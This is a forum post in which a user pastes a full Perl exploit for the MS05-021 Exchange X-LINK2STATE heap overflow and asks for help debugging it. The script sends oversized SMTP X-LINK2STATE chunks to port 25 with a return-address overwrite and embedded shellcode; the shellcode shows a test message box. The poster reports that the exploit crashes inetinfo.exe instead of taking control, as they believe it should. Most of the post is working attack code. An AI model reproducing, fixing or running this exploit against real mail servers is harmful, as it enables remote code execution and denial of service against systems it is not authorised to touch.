| annointed3 |
| Beginner |
 |
|
| Joined: May 03, 2005 |
| Posts: 1 |
|
|
|
 |
|
 |
|
Hi,
I am testing the exploit below on my test lab network:
| Code: |
#!/bin/perl
#
#
# MS05-021 Exchange X-LINK2STATE Heap Overflow
# Author: Evgeny Pinchuk
# For educational purposes only.
#
# Tested on:
# Windows 2000 Server SP4 EN
# Microsoft Exchange 2000 SP3
#
# Thanks and greets:
# Halvar Flake (thx for the right directions)
# Alex Behar, Yuri Gushin, Ishay Sommer, Ziv Gadot and Dave Hawkins
#
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
my $EAX="\x55\xB2\xD3\x77"; # CALL DWORD PTR [ESI+0x4C] (rpcrt4.dll)
my $ECX="\xF0\xA1\x5C\x7C"; # lpTopLevelExceptionFilter
my $JMP="\xEB\x10";
my $SC="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\xD5\x01" .
"\x59\x7C\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x5F" .
"\x0C\x59\x7C\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0D\x31\xd2\x52\x51" .
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\x72\x69\x59\x7C\xff\xd0\xe8\xc4\xff" .
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff" .
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff" .
"\xff\x4D\x53\x30\x35\x2D\x30\x32\x31\x20\x54\x65\x73\x74\x4e";
my $cmd="X-LINK2STATE CHUNK=";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 1st chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "A"x30 . $JMP . $EAX . $ECX . "B"x100 . $SC;
my $left=1000-length($request);
$request = $request . "C"x$left;
$request = $cmd . $request . "\r\n";
send $socket, $request, 0;
print "[+] Sent 2nd chunk\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
close $socket;
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 3rd chunk\n";
close $socket;
|
While stepping through this exploit in a debugger, line 73
| Code: |
send $socket, $request, 0;
|
This is the last send request of the program. Anyway, this line of code crashes my exchange server. I get the error message " inetinfo.exe application error The instruction at 0x77fcc663" referenced memory at "0x7c5ca1f0". The memory could not be written. Well, I was wondering if I can use this info to help determine why the exploit is not working. From the research I've done, this code is supposed to add a user to the target box. Any ideas would be greatly appreciated. |
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 101
Members: 0
Total: 101
